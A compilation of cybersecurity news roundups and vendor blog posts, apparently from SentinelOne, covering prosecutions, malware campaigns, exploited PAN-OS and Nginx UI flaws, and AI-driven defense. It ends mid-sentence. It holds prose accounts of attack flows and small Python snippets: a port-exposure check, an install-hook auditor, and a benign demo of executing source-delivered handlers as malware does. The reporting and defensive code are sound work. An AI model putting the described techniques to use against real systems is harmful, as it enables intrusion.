
The Good, the Bad and the Ugly in Cybersecurity – Week 19

The Good | Courts Sentence Karakurt Ransomware Negotiator & Two DPRK IT Worker Scheme Facilitators

Federal authorities have successfully secured a nearly nine-year prison sentence for Deniss Zolotarjovs, a Latvian national extradited to the U.S. for his critical role in the Karakurt extortion syndicate.

Operating as a specialized “cold case” negotiator, Zolotarjovs (aka Sforza_cesarini) systematically targeted victims who had previously stopped communications with the extortion group to avoid paying the ransom. To coerce the ransom payments, he focused on analyzing stolen personal data and information about the target companies to exert intense psychological pressure on the victims. In some cases, Zolotarjovs resorted to leveraging sensitive health information, including children’s medical records, to force the victim to complete the ransom payment.

Source: Dayton247now

The broader Karakurt operation has extorted an estimated $56 million from dozens of compromised organizations. As the first Karakurt member to face federal prosecution, Zolotarjovs’s sentencing is a hard-won milestone in ongoing efforts to dismantle international cyber-extortion rings.

In a separate victory, U.S. prosecutors sentenced two American nationals to 18 months in prison each for operating extensive laptop farms that actively facilitated North Korean cyber infiltration.

Matthew Knoot and Erick Prince were prosecuted for helping DPRK-based IT workers secure remote employment at almost 70 U.S. companies by exploiting stolen identities. The pair received company-issued laptops and deployed unauthorized remote desktop software, allowing the North Korean workers to seamlessly masquerade as legitimate domestic employees.

The FBI continues to warn about the thousands of North Korean IT workers working to infiltrate U.S. firms to steal intellectual property, implant malware, and siphon funds to the heavily sanctioned regime.

The Bad | PCPJack Worm Evicts TeamPCP, Steals Cloud Credentials at Scale

SentinelLABS researchers this week exposed PCPJack, a sophisticated credential theft framework and cloud worm that targets public infrastructure to harvest sensitive data.

Unlike other known cloud hacktools, the toolset actively hunts, evicts, and systematically deletes artifacts associated with TeamPCP, a threat group responsible for multiple high-profile supply chain intrusions earlier this year.

The multi-stage infection chain begins with a shell script called bootstrap.sh, which establishes persistence and selectively downloads specialized Python modules from an attacker-controlled Amazon S3 bucket. The malware extracts a massive array of sensitive credentials, including cloud access keys, Kubernetes service account tokens, Docker secrets, enterprise productivity application tokens, and cryptocurrency wallets. Unlike typical cloud-focused threat campaigns, PCPJack does not deploy cryptomining payloads on victims.

Beginning of bootstrap.sh, the dropper script

To achieve lateral movement, the framework exploits a number of web vulnerabilities, including severe Next.js and WordPress flaws, while aggressively scanning for poorly secured Docker, Redis, RayML, and MongoDB instances. Stolen data is then encrypted before being exfiltrated via attacker-controlled Telegram channels.

Security teams are advised to strictly enforce multi-factor authentication on service accounts, restrict Kubernetes access scopes, use an enterprise-wide vault, and thoroughly secure all exposed cloud management interfaces.
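Since PCPJack aggressively scans for poorly secured Docker, Redis, Ray, and MongoDB services, defenders can run the same check against their own hosts before attackers do. A minimal sketch in Python (the ports listed are the services' well-known defaults, not indicators drawn from the malware itself):

```python
import socket

# Default ports for the services PCPJack reportedly scans for. These are
# the services' well-known defaults, not IoCs taken from the malware.
SERVICE_PORTS = {
    "Docker API": 2375,
    "Redis": 6379,
    "MongoDB": 27017,
    "Ray dashboard": 8265,
}

def exposed_services(host: str, ports: dict = SERVICE_PORTS,
                     timeout: float = 1.0) -> list:
    """Return names of services accepting TCP connections on `host`."""
    found = []
    for name, port in ports.items():
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connect succeeded
                found.append(name)
    return found

if __name__ == "__main__":
    print(exposed_services("127.0.0.1"))
```

Any service this reports as reachable from an untrusted network segment should be firewalled or bound to localhost; a connect check alone says nothing about whether authentication is enforced.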

The Ugly | Palo Alto Warns of Critical Flaw in PAN-OS Enabling Remote Code Execution

Palo Alto Networks customers were issued an urgent warning this week regarding a critical-level, unpatched zero-day vulnerability currently being exploited in the wild.

Tracked as CVE-2026-0300, the buffer overflow flaw directly impacts the PAN-OS User-ID Authentication Portal (aka the Captive Portal), enabling unauthenticated attackers to execute arbitrary code with root privileges using specially crafted packets.

With a CVSS score of 9.3, the vulnerability presents an immediate risk to enterprise networks. Threat watchdog Shadowserver has currently identified over 5,000 vulnerable firewalls exposed online, primarily concentrated across Asia and North America.

Source: Shadowserver (current as of this writing)

This actively exploited vulnerability adds to the growing pattern of targeting edge infrastructure. PAN-OS has a well-documented history of severe zero-days, and with 90% of Fortune 10 companies and many major U.S. banks depending on it, the exposure is significant. CISA has added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, setting mandatory remediation deadlines for federal civilian agencies.

With a patch not expected until mid-May, Palo Alto is urging administrators to secure affected environments immediately, starting by confirming exposure via the device’s Authentication Portal Settings. To successfully mitigate the threat of remote code execution, security teams can restrict all User-ID Authentication Portal access exclusively to trusted internal IP addresses. If strict network segmentation is impossible, organizations are being advised to disable the Captive Portal service until updates can be safely applied.
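The IP restriction itself is configured on the firewall, not in code, but the underlying allow-list logic is simple to sketch and useful when auditing portal access logs for requests that should never have arrived. A hypothetical helper, with RFC 1918 ranges standing in for an organization's actual trusted networks:

```python
import ipaddress

# Hypothetical trusted ranges; substitute your organization's real
# internal networks before using this for log review.
TRUSTED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.0.0/16"),
]

def is_trusted(source_ip: str) -> bool:
    """True if `source_ip` falls inside a trusted internal range."""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net for net in TRUSTED_NETWORKS)
```

Flagging portal requests where `is_trusted()` returns False is a quick way to verify that the network-level restriction is actually holding.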

The Good, the Bad and the Ugly in Cybersecurity – Week 18

The Good | Authorities Dismantle State-Backed Espionage & Cybercrime Rings

This week, authorities successfully secured the extradition of Xu Zewei, an alleged Chinese Ministry of State Security (MSS) contract hacker, from Italy to the U.S. to face severe federal cyberespionage charges. Operating alongside the Silk Typhoon group, Xu systematically compromised internet-facing systems during a highly coordinated intelligence-gathering campaign between February 2020 and June 2021. The DoJ says that the attackers relentlessly targeted COVID-19 research organizations, stealing critical vaccine and treatment data by exploiting Microsoft Exchange Server zero-day vulnerabilities and deploying malicious web shells for deep network access. Xu is set to appear in federal court where he faces multiple counts of computer intrusions and conspiracy.

Source: Italian Justice System

European law enforcement agencies have dismantled a widespread cryptocurrency investment fraud network responsible for inflicting over €50 million in estimated global losses. Operating almost identically to a legitimate enterprise, the syndicate employed up to 450 individuals across several specialized call centers located in Albania. Threat actors worked by luring vulnerable victims through online advertisements, assigning “retention agents” who wore down the targets through intense pressure and remote access software to manipulate deposits. Illicit funds were then channeled into international money-laundering pipelines to evade authorities worldwide.

Evan Tangeman received a nearly six-year prison sentence for laundering $230 million in a cryptocurrency heist that took place between October 2023 and May 2025. Based on court documents, attackers initially breached a Washington D.C. victim by aggressively impersonating Gemini customer support, leveraging remote desktop software to steal thousands of Bitcoin after bypassing two-factor authentication protocols. Tangeman systematically obfuscated the stolen proceeds through a network of cryptocurrency mixers, exchanges, and virtual private networks. The ill-gotten funds financed the criminal organization’s lavish lifestyle until his eventual arrest by law enforcement officials.

The Bad | New Report Shows Scammers Stole $2.1 Billion from Social Media Users

A new warning has come from the U.S. Federal Trade Commission (FTC) regarding a sharp surge in social media fraud, with reported consumer losses exceeding $2.1 billion in 2025, an eightfold increase since 2020. Malicious actors actively leveraged platforms like Facebook, Instagram, and WhatsApp to exploit nearly 30% of all fraud victims last year. Remarkably, individuals reported losing significantly more money to Facebook-originated schemes than to traditional text and email campaigns combined, establishing the platform as the primary threat vector for almost every age demographic.

Who gets scammed more often, younger people or older adults? At the FTC we know scammers target everyone, and FTC Chairman @AFergusonFTC has a message that might surprise you: pic.twitter.com/8kveWbsM0e

— FTC (@FTC) April 27, 2026

Operating with a global reach and minimal overhead, threat actors systematically hijack legitimate user accounts, analyze personal posts to craft highly targeted social engineering lures, and actively purchase deceptive advertisements. These criminal syndicates utilize the exact same marketing tools legitimate businesses employ, filtering potential victims by age, precise interests, and specific shopping habits to maximize the returns.

In direct response to these findings, Meta has already removed more than 159 million scam advertisements and taken down nearly 11 million malicious accounts tied to criminal operations last year. Additionally, the tech giant has introduced advanced anti-scam protections across its product ecosystem, proactively flagging suspicious friend requests, implementing intelligent chat detection systems, and introducing critical screen sharing warnings on WhatsApp to disrupt fraudulent video calls.

To successfully navigate and mitigate social engineering tactics, federal authorities strongly urge users to strictly limit profile visibility, independently verify unfamiliar online vendors, and reject any unsolicited investment advice originating from unknown social media contacts.

The Ugly | Threat Actors Poison SAP-Related npm Packages in Supply Chain Attack

Cybersecurity researchers are tracking a highly sophisticated supply chain attack targeting SAP-related npm packages with credential-stealing malware. Dubbed “Mini Shai-Hulud”, the campaign recently compromised vital packages within SAP’s cloud application development ecosystem, including @cap-js/db-service@2.10.1, @cap-js/postgres@2.2.2, @cap-js/sqlite@2.2.2, and mbt@1.2.48. Threat actors executed the breach by exploiting an npm OIDC trusted publishing configuration gap, allowing them to exchange a token and publish poisoned package versions to the registry.

Source: Aikido

Once installed, the malicious releases deploy a preinstall script acting as a runtime bootstrapper to immediately download and execute a platform-specific Bun binary. The malware then harvests local developer credentials, GitHub and npm tokens, GitHub Actions secrets, cloud secrets from major providers, and passwords across multiple web browsers. To establish persistence, the payload targets AI coding agent configurations by injecting malicious files into Claude Code and Visual Studio Code settings. This ensures automated execution whenever an infected repository is opened. To add to this, the malware deliberately terminates on Russian-locale systems, strongly linking the entire operation to previous TeamPCP threat actors.
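Because the poisoned releases hinge on an npm preinstall lifecycle script, one quick triage step is simply enumerating which installed packages declare install-phase scripts at all. A minimal defensive sketch (an audit helper of my own construction, not part of any published IoC tooling; install hooks are also used legitimately, so hits require manual review):

```python
import json
from pathlib import Path

# npm lifecycle scripts that run automatically at install time.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

def packages_with_install_hooks(node_modules: str) -> dict:
    """Map package name -> its declared npm install-phase scripts."""
    results = {}
    for manifest in Path(node_modules).glob("**/package.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue  # skip unreadable or malformed manifests
        scripts = data.get("scripts") or {}
        hooks = {k: v for k, v in scripts.items() if k in INSTALL_HOOKS}
        if hooks:
            results[data.get("name", str(manifest))] = hooks
    return results
```

Running this over a project's `node_modules` directory surfaces every package that executes code at install time, which is exactly the surface this campaign abused.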

The stolen data is securely encrypted using AES-256-GCM and exfiltrated to public GitHub repositories created on the victim’s own account. By leveraging GitHub as their primary command and control (C2) infrastructure, the attackers make tracing and blocking exfiltration exceptionally difficult for security and development teams.

Since the massive payload utilizes stolen tokens to aggressively self-propagate, injecting malicious workflows into newly discovered repositories further spreads the poisoned packages across environments. Package maintainers have rapidly released updated, safe versions of the affected software to immediately mitigate this expanding threat.

The Good, the Bad and the Ugly in Cybersecurity – Week 17

The Good | Two Cybercrime Leaders Face Justice for Fraud, Identity Theft & Extortion

Tyler Robert Buchanan, a 24-year-old British national believed to be a leader of the UNC3944 cybercrime group, has pleaded guilty in the U.S. to wire fraud and aggravated identity theft. Prosecutors say Buchanan and four accomplices stole at least $8 million in cryptocurrency by targeting employees at multiple organizations with SMS phishing attacks between 2021 and 2023. Victims were tricked into entering credentials on fake company login pages, allowing attackers to hijack email accounts, conduct SIM swaps, and drain cryptocurrency wallets.

Buchanan arrested in Spain (Source: Spanish National Police Corps)

Arrested in Spain in 2024 and extradited to the U.S. last year, Buchanan now faces up to 22 years in prison at his sentencing this August. UNC3944 (aka 0ktapus, Scattered Spider) has historically been linked to major breaches at MGM Resorts International, Twilio, and Caesars Entertainment.

In a second guilty plea this week, Angelo Martino, a former ransomware negotiator at DigitalMint, has formally admitted to helping the BlackCat ransomware gang extort U.S. companies. Martino secretly shared clients’ confidential negotiation strategies and insurance policy limits with BlackCat operators, enabling them to demand larger ransoms. He also worked directly with other DigitalMint and Sygnia accomplices to launch ransomware attacks against multiple victims in 2023, targeting law firms, school districts, medical facilities, and financial firms. In one case, a victim paid over $25 million to settle the ransom.

Authorities have since seized $10 million in Martino’s assets, including cryptocurrency and luxury vehicles. He also faces up to 20 years in prison when sentenced in July on charges of conspiracy to interfere with interstate commerce by extortion, as well as intentional damage to protected computers.

The Bad | Chinese-Linked Threat Actors Expand Botnets to Disguise Cyberattacks

The U.K.’s National Cyber Security Centre (NCSC-UK) and allied cyber agencies are warning that China-linked actors are increasingly relying on vast proxy networks of hijacked consumer devices to conceal cyberattacks and evade detection. A new joint statement details how the threat actors now route malicious traffic through compromised routers, cameras, recorders, and network-attached storage (NAS) devices instead of using rented infrastructure. This method means attacks are harder to trace since their geographic origins are masked.

Covert network typical setup (Source: NCSC-UK)

Officials say most China-nexus groups are now leveraging constantly shifting covert proxy networks, sometimes shared across multiple threat actors. These networks are mostly made up of Small Office Home Office (SOHO) routers, smart devices, and Internet of Things (IoT) devices. One example is a massive botnet called Raptor Train, which infected more than 260,000 devices in 2024 and was linked by the FBI to the state-backed Flax Typhoon and Integrity Technology Group, sanctioned back in January 2025. Another network, KV Botnet, has been tied to the PRC-backed Volt Typhoon group and targets vulnerable routers that no longer receive security updates. Though KV Botnet was disrupted by authorities in January 2024, Volt Typhoon actors began reviving it as of November that same year.

Authorities warn these botnets undermine traditional IP-blocking defenses because their infrastructure constantly changes. To reduce exposure, organizations are being urged to strengthen edge security by enforcing multi-factor authentication, maintaining updated inventories of internet-facing devices, using dynamic threat intelligence feeds, and adopting zero-trust controls. The advisory outlines the growing concern that everyday internet-connected devices are being weaponized at scale to support stealthy cyber operations targeting governments, telecom providers, defense contractors, and critical infrastructure worldwide.

The Ugly | ShadowBrokers Leak Links to Pre-Stuxnet Sabotage Framework

SentinelLABS has identified a previously undocumented cyber sabotage framework, tracked as “fast16”, with core components dating back to 2005. The operation centers on a kernel driver, fast16.sys, designed to intercept executable files in memory and subtly alter high-precision calculations to corrupt scientific and engineering outputs at scale.

The framework predates Stuxnet by at least five years and even early Flame-era tooling, making it one of the earliest known examples of a modular, Lua-based malware architecture. It was discovered alongside a companion service binary, svcmgmt.exe, which embeds a Lua virtual machine, encrypted bytecode, and system-level modules for propagation, persistence, and coordination across infected systems.

Unlike typical worms of its era, fast16 was engineered for targeted sabotage rather than indiscriminate spread. It selectively identifies compiled executables, particularly those using Intel toolchains, and injects rule-based modifications into floating-point computation routines.

SentinelLABS believes this could have introduced systematic errors into domains such as physics simulations, cryptographic research, and structural engineering models, effectively undermining high-value scientific workloads without obvious system failure. The carrier component also functions as a platform for self-propagating “wormlets” (small wormable payloads), capable of deploying across networks using native Windows 2000/XP services and weak administrative credentials.

Structure of the internal storage
Wormlets stored in the carrier’s internal storage

SentinelLABS linked fast16.sys to the infamous ShadowBrokers leak from 2017 via deconfliction signatures used within advanced state-level tooling ecosystems by the NSA. Although full target attribution remains incomplete, analysis of matching code patterns suggests potential alignment with high-precision simulation software used in engineering and defense research.

The fast16 framework offers a rare early glimpse into real-world operations where kernel-level tampering, modular scripting, and precision sabotage logic were already converging. Although fast16 itself was built to run on now-obsolete operating systems, SentinelLABS’ discovery pushes back the accepted timeline on modern tradecraft, showing how well-resourced actors had been building long-lived implants that prefigured today’s state-backed cyber programs years earlier than previously thought.

Automation at Machine Speed: Rethinking Execution in Modern Cybersecurity

In our previous posts, we explored the Identity Paradox and the rising risks at the enterprise edge. Together, these blogs highlighted how attackers gain initial access and leverage unmanaged devices to escalate privileges. The next phase of intrusion – execution – demonstrates how modern adversaries, aided by automation and AI, operate at a speed and scale that challenge traditional human-centered defenses. Understanding these capabilities is critical for organizations aiming to reduce attacker dwell time and maintain operational resilience.

Automation: The Real Machine Multiplier

The cybersecurity conversation today often centers on AI, with organizations experimenting with generative models, agentic systems, and predictive analytics. While these tools offer unique capabilities, the backbone of modern defense and the source of the real operational advantage is automation.

In today’s landscape of shrinking response windows, adversaries operate almost entirely at machine speed, and human operators alone cannot respond fast enough to prevent compromise. Automation enables defenders to reclaim the tempo. By integrating AI insights into hardened automated workflows, security teams can move from reactive triage to proactive intervention, closing gaps before attackers can exploit them. SentinelOne’s® own internal data demonstrates the tangible impact of this shift: proper automation reduced analysts’ manual workload by approximately 35% despite 63% growth in total alerts, proving that automation increases operational speed.

AI as Insight, Not Just Hype

The irony of AI innovation in the last year is that the AI tools we deploy to defend ourselves now need defending. The attack surface didn’t just grow, it folded back on itself. Automation executes tasks at speed, but AI provides context and predictive intelligence that guides those tasks. AI for security encompasses two complementary disciplines:

  • Security for AI: Protecting AI tools, models, and agentic systems themselves from misuse or compromise. This includes governing employee access, ensuring secure coding practices, and managing autonomous AI agents.
  • AI for Security: Leveraging machine learning and reasoning systems to detect and respond to threats faster than traditional rule-based approaches.

AI excels in identifying subtle behavioral patterns, predicting attacker intent, and supporting agentic workflows that can autonomously investigate alerts, recommend actions, and enforce pre-approved policies. By combining high-quality data, low-latency telemetry, and centralized visibility, AI transforms raw signals from endpoints, cloud environments, and identity systems into actionable insights.

However, AI is not a panacea. Without robust automation to operationalize these insights, organizations risk generating alerts faster than they can respond, replicating the same bottlenecks that have plagued traditional security operations.

Threats Accelerated by Automation and AI

Attackers are leveraging the same principles. Across campaigns observed in 2025 and 2026, adversaries are increasingly automating reconnaissance, exploitation, and lateral movement. Examples include:

  • AI-assisted phishing: Rapid generation of highly localized and convincing campaigns in minutes, bypassing traditional content filters.
  • Polymorphic malware: AI-generated malware that mutates faster than signature-based defenses can detect.
  • Automated pivoting: Integration with compromised edge devices or cloud assets to move laterally and escalate privileges at machine speed.

These behaviors compress the attack lifecycle dramatically. What once required hours or days now occurs in milliseconds, highlighting why both automation and AI must form the core of modern defensive strategies.

Transforming Enterprise Operations with Agentic AI

Defending against machine-speed attacks requires agentic AI – systems that can perform investigative and response tasks autonomously, but under human-defined guardrails. SentinelOne’s Purple AI™ exemplifies this approach:

  • Agentic auto-investigations: From alert assessment to hypothesis validation, Purple AI can perform complete investigations with minimal human intervention, documenting every step for audit and compliance.
  • Custom detection creation: Analysts receive agentically recommended detection rules that can be implemented immediately to stop similar attacks before they spread.
  • Integrated hyperautomation: Workflows, alerts, and response actions are executed automatically across endpoints, cloud services, and AI systems, enabling coordinated defense at machine speed.

These capabilities bridge the gap between insight and action, ensuring that detection is accurate and response is rapid, precise, and auditable. As organizations adopt AI for business processes, security must evolve to address the expanding attack surface. Key challenges include:

  • Shadow AI adoption: Employees and teams using unmonitored AI tools create unseen channels for data exfiltration or misconfiguration.
  • Agentic AI risks: Autonomous agents acting without sufficient oversight could unintentionally expose sensitive data or introduce vulnerabilities.
  • Data velocity and volume: AI systems rely on vast, real-time data streams. Ensuring integrity, context, and governance of that data is critical to maintain trust in automated defenses.

Solutions must integrate visibility, control, and governance. SentinelOne’s Prompt Security portfolio provides real-time monitoring for employee AI use, AI coding tools, and agentic AI operations. By automatically redacting secrets, blocking vulnerable code, and enforcing policy compliance, organizations can safely harness AI while reducing exposure.

Meanwhile, Observo AI and AI-native SIEM integration enable organizations to ingest, normalize, and analyze petabytes of telemetry in near real time. By pairing this high-fidelity data with Purple AI’s agentic reasoning, defenders can detect threats, trigger pre-approved responses, and maintain operational oversight across both traditional and AI-native environments.

Operational Principles for Machine-Speed Defense

Implementing an effective AI- and automation-driven security strategy requires clear guiding principles:

  • Intelligence Over Rules: Move beyond static signatures to behavioral and predictive detection. Threats evolve faster than predefined rules; systems must continuously learn, reason, and adapt.
  • Autonomy with Accountability: Automation and agentic AI should operate at machine speed, but within human-defined guardrails, ensuring actions remain traceable, auditable, and aligned with policy.
  • Unified Data and Context: Signals from endpoints, identities, cloud, and AI tools must be fused to create a coherent understanding. Insight without context is noise; action without context is risk.

When consistently applied, these principles reduce dwell time, enable faster response, and ensure that human expertise is focused on high-value decision-making rather than repetitive manual tasks.

Conclusion | Automation & AI as Allies

For two decades, security has been a human-speed discipline applied to a machine-speed problem. That model is over. The organizations that will lead from here aren’t the ones with more analysts or better dashboards. They’re the ones where detection, investigation, and response happen autonomously. The future will be defined by organizations where human and AI manage the SOC together: AI reasons, automation acts, and humans govern the process. Not in sequence. In parallel. At machine speed.

Execution is no longer a phase in the kill chain. It’s the entire game. The defenders who win it won’t be the fastest responders. They’ll be the ones who made their response automatic.

The evolution of execution in cybersecurity demonstrates a broader trend: defenders must match the speed, scale, and sophistication of adversaries. More than just tools, automation and AI are partners in defense, extending human capacity while maintaining oversight, context, and control.

Organizations that invest in integrated, agentic AI systems and robust automated workflows can detect and respond to attacks in real time, reduce analyst workload while increasing coverage, and secure AI adoption itself, maintaining trust in both technology and operations. This shift marks a transition from perimeter-based and manual defense to autonomous, adaptive security, where systems and people collaborate to outpace attackers, secure critical assets, and support business innovation.

Execution is the new frontier in the cyber kill chain. By combining automation, AI-driven insight, and human oversight, organizations can operate at machine speed, defend against advanced threats, and confidently embrace AI-powered transformation.

As the cybersecurity landscape evolves, success will no longer depend solely on faster patching, deeper monitoring, or more alerts. It will depend on the intelligent orchestration of people, machines, and AI, enabling defenders to act faster, smarter, and with confidence in a world where adversaries are already moving at machine speed.

SentinelOne's Annual Threat Report
A defender’s guide to the real-world tactics adversaries are using today to abuse identity, exploit infrastructure gaps, and weaponize automation.

 

The Good, the Bad and the Ugly in Cybersecurity – Week 16

The Good | U.S. Authorities Seize W3LL Phishing Ring & Jail DPRK IT Worker Scheme Facilitators

The FBI has dismantled the “W3LL” phishing platform, seized its infrastructure, and arrested its alleged developer in the agency’s first joint crackdown on a phishing kit developer with Indonesian authorities. Sold for $500 per kit, W3LL enabled criminals to clone login portals, steal credentials, bypass MFA using adversary-in-the-middle techniques, and launch business email compromise attacks.

The W3LL Store interface (Source: Group-IB)

Through the W3LL Store marketplace, more than 25,000 compromised accounts were sold, fueling over $20 million in attempted fraud. Even after the storefront shut down in 2023, the operation continued through encrypted channels under new branding, offering cybercriminals an end-to-end phishing service that was ultimately used against over 17,000 victims worldwide. Investigators say the takedown disrupted a major criminal ecosystem that helped more than 500 threat actors steal access, hijack accounts, and commit financial fraud.

From the DoJ, two U.S. nationals have been sentenced for helping North Korean IT workers pose as American residents and secure remote jobs at more than 100 U.S. companies, including Fortune 500 firms. Court documents note that between 2021 and 2024, the scheme generated over $5 million for the DPRK and caused about $3 million in losses to victim companies. The defendants used stolen identities from over 80 U.S. citizens, created fake companies and financial accounts, and hosted company-issued laptops in U.S. homes so North Korean workers could secretly access corporate networks.

U.S. officials said the operation endangered national security by placing DPRK operatives inside American businesses. Kejia Wang was sentenced to nine years in prison, while Zhenxing Wang received over seven years. Authorities say the broader network remains active, with additional suspects still at large, as North Korea continues using fraudulent remote workers to fund government operations and evade sanctions.

The Bad | New “AgingFly” Malware Breaches Ukrainian Governments & Hospitals

Ukraine’s CERT-UA has uncovered a new malware campaign using a toolset called “AgingFly” to target local governments, hospitals, and possibly Ukrainian defense personnel.

The attack, tracked as UAC-0247, begins with phishing emails disguised as humanitarian aid offers that lure victims into downloading malicious shortcut files. These files trigger a chain of scripts and loaders that ultimately deploy AgingFly, a C# malware strain that gives attackers remote control of infected systems.

Example of the infection chain (Source: CERT-UA)

Once installed, AgingFly can execute commands, steal files, capture screenshots, log keystrokes, and deploy additional payloads. It also uses PowerShell scripts to update configurations and retrieve command and control (C2) server details through Telegram, helping the malware remain flexible and persistent.

One notable feature is that it downloads pre-built command handlers as source code from the server and compiles them directly on the infected machine, reducing its static footprint and helping it evade signature-based detection tools.
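This compile-on-host pattern is easy to illustrate. AgingFly does it with C# source compiled via .NET on the victim machine; the benign Python sketch below only demonstrates the general technique of executing source-delivered handlers, which never exist on disk as compiled artifacts for a scanner to fingerprint:

```python
# A command handler delivered as source text rather than as a binary.
# Entirely benign; this only demonstrates why source-delivered handlers
# leave little for signature-based scanners to match on.
handler_source = """
def handle(args):
    return "pong" if args == "ping" else "unknown"
"""

def load_handler(source: str):
    """Compile and execute handler source, returning its `handle` function."""
    namespace = {}
    exec(compile(source, "<remote-handler>", "exec"), namespace)
    return namespace["handle"]

handler = load_handler(handler_source)
print(handler("ping"))  # the handler ran without a compiled file on disk
```

For defenders, the takeaway is that detection has to key on behavior (network fetch followed by in-memory compilation and execution) rather than on hashes of a payload that is never written out in detectable form.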

Investigators found that the attackers use open-source tools such as ChromElevator to steal saved passwords and cookies from Chromium-based browsers, and ZAPiDESK to decrypt WhatsApp data. Additional tools like RustScan, Ligolo-ng, and Chisel support reconnaissance, tunneling, and lateral movement across compromised networks. CERT-UA says the campaign has impacted at least a dozen organizations and may also have targeted members of Ukraine’s defense forces.

To reduce exposure, the agency recommends blocking the execution of LNK, HTA, and JavaScript files, along with restricting trusted Windows utilities such as PowerShell and mshta.exe that are abused in the attack chain.

The Ugly | Attackers Exploit Nginx Auth Bypass Vulnerability to Hijack Servers

A critical vulnerability in Nginx UI, tracked as CVE-2026-33032, is being actively exploited in the wild to achieve full server takeover without authentication.

The flaw stems from an exposed /mcp_message endpoint in systems using Model Context Protocol (MCP) support, which fails to enforce proper authentication controls. As a result, remote attackers can invoke privileged MCP functions, including modifying configuration files, restarting services, and forcing automatic reloads to effectively gain complete control over affected Nginx servers.

Attacker-controlled page served by Nginx (Source: Pluto Security)

Security researchers have reported that exploitation requires only network access. Attackers initiate a session via Server-Sent Events, open an MCP connection, retrieve a session ID, and then use it to send unauthenticated requests to the vulnerable endpoint.

This grants access to all available MCP tools, executing destructive capabilities like injecting malicious server blocks, exfiltrating configuration data, and triggering service restarts.
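The session flow above suggests a simple triage check for defenders: an unauthenticated request against the MCP endpoint should be rejected on a patched instance. The sketch below classifies hypothetical responses; the exact status codes and response shapes are assumptions for illustration, not the documented Nginx UI API.

```python
# Minimal triage sketch for the auth-bypass pattern described above: on a
# patched instance, an unauthenticated POST to the /mcp_message endpoint
# should be rejected. The response shapes below are assumptions made for
# illustration, not the documented Nginx UI behavior.

def looks_vulnerable(status_code: int, body: dict) -> bool:
    """Classify a response to an unauthenticated /mcp_message request."""
    if status_code in (401, 403):
        return False  # authentication is being enforced
    # A 200 carrying a JSON-RPC style result suggests the MCP call executed
    # without any credential check.
    return status_code == 200 and ("result" in body or "tools" in body)

print(looks_vulnerable(401, {}))                          # patched / protected
print(looks_vulnerable(200, {"result": {"tools": []}}))   # likely exploitable
```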

The vulnerability was patched in version 2.3.4 shortly after disclosure, but a more secure release, 2.3.6, is now recommended. Despite the fix, active exploitation in the wild has been confirmed, with proof-of-concept code publicly available.

Nginx UI is widely used, with over 11,000 GitHub stars and hundreds of thousands of Docker pulls, and scans suggest roughly 2,600 exposed instances remain vulnerable globally. Attackers can establish MCP sessions, reuse session IDs, and chain requests to escalate privileges, enabling stealthy persistence, configuration tampering, and full administrative control over exposed systems.

Organizations are urged to update immediately, as attackers can fully compromise systems through a single unauthenticated request, bypassing traditional security controls and gaining persistent control over web infrastructure.

Frontier AI Reinforces the Future of Modern Cyber Defense

The latest announcements from OpenAI and Anthropic mark another important step forward for frontier AI. They also reinforce something we’ve believed at SentinelOne® for years: the future of cybersecurity will be shaped by AI-native defense.

SentinelOne has worked closely with frontier labs for years, including OpenAI, Anthropic, and Google DeepMind, and naturally continues to do so. While we cannot always share the specifics of every collaboration, these partnerships have provided, and continue to provide, meaningful insight into how advanced models are evolving and where they can create real impact across security. Many of these learnings and capabilities are already embedded in our platform, protecting customers from the most advanced attacks every day and stopping zero-day exploits that no other solution currently can.

What stands out most is not simply that frontier models are becoming more capable, but that they are accelerating the broader shift toward faster, more intelligent, and more automated security operations. On the one hand, they are improving how the cyber industry and defenders identify weaknesses, analyze complex systems, and reason about attack paths at scale. On the other, they are giving attackers the advantage of speed and scale when it comes to finding new vulnerabilities. Progress in this race matters, but it is only one part of the broader security picture.

In practice, and without discounting the severity of uncovering exponentially more bugs in software, raw vulnerability counts rarely map cleanly to real-world risk. Many vulnerabilities are not meaningfully exploitable in live environments, and many are already reduced by architectural layers, controls, mitigations, and runtime protections. The gap between theoretical exposure and operational risk is often substantial. What matters most is the ability to understand real conditions, prioritize what matters, and stop actual attacks across complex environments, even when faced with novel threats and zero days.

That has been SentinelOne’s pioneering principle and the advantage we’ve delivered to our customers from the beginning.

From day one, SentinelOne was built to operate at machine speed, using behavioral AI, automation, and autonomous protection to detect, defend, and respond across endpoint, cloud, identity, data, network, and AI attack surfaces. As frontier AI continues to advance, the value of that approach only grows. To demonstrate our commitment to these principles, we offer two distinct examples.

First, in the last few weeks alone, the benefit of such an approach has played out in supply chain attacks, like LiteLLM, Axios, and CPU-Z, all illustrative of novel threats and the risk of trusted agents and workflows in the AI era. In each case, autonomous response at machine speed was the only antidote to these novel threats, which leverage unpatched or zero-day vulnerabilities.

Second, SentinelOne has demonstrably expanded its own ongoing efforts to secure our technology. Along with the standard, established efforts we’ve used for years, SentinelOne has used multiple AI-driven models to constantly examine our technology and architecture, using techniques virtually identical to those discussed in Anthropic’s technical details for researchers and practitioners released April 7th, 2026 (Assessing Claude Mythos Preview’s cybersecurity capabilities). This activity has been ongoing for months; it is consistently reviewed for findings and evaluated as a program by the SentinelOne executive team. It is our commitment to build and deliver secure technology, and we do not see an effective future in this work without robust AI-driven methods and an inclusive, multi-model approach.

As we look at the overall AI landscape, the shift is already underway, and it plays directly to SentinelOne’s strengths. The industry is moving toward more autonomous, more adaptive, and more intelligence-driven security. That is the future we helped pioneer, and one we are uniquely positioned to lead.

Our clear advice to defenders: Invest in machine-speed defense and visibility right now. Ensure your defenses are up to date and well configured. Ground yourself in true research, not press releases and hype. As an example, much of the press coverage and commentary shared by third parties around Anthropic’s new model release has lacked any substantive data; in many cases those statements preceded any real, tangible experience with the preview models in question. By contrast, the AI Security Institute (AISI) released a detailed research evaluation of relevant models that sheds light on the state of frontier AI, exploitation rates, and potential real-world implications. It clearly shows that the trajectory, even from older models, had been apparent for a while, and that this capability has existed and has largely been a function of compute scaling, as well as potentially the result of looser guardrails allowing more effective compute and reasoning than guardrailed models:

Source: AISI, Our evaluation of Claude Mythos Preview’s cyber capabilities, April 13th 2026

The AI Security Institute goes on to outline the following implications:

